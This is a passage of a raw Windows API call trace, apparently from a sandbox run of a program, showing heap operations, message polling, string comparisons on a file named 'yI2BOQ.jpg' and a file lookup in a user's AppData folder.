1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.128] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0207.129] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.129] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0207.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0207.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0207.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yI2BOQ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I2BOQ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2BOQ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOQ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OQ.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0207.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0207.130] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0207.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0207.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0207.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yI2BOQ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I2BOQ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2BOQ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOQ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0207.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OQ.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0207.131] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0207.131] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0207.131] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0207.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0207.132] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0207.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.132] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0207.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.132] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.133] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.133] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/yI2BOQ.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a579e30, ftCreationTime.dwHighDateTime=0x1d4ccb5, ftLastAccessTime.dwLowDateTime=0x99b27a90, ftLastAccessTime.dwHighDateTime=0x1d4d539, ftLastWriteTime.dwLowDateTime=0x99b27a90, ftLastWriteTime.dwHighDateTime=0x1d4d539, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0xa0d0039, dwReserved1=0x1af64, cFileName="yI2BOQ.jpg", cAlternateFileName="")) returned 0xaa5760 [0207.133] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0207.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.134] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.136] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.136] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0207.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0207.136] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.137] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.137] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.137] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.137] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0207.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.138] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.138] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.139] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0207.139] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0207.140] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0207.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0207.141] 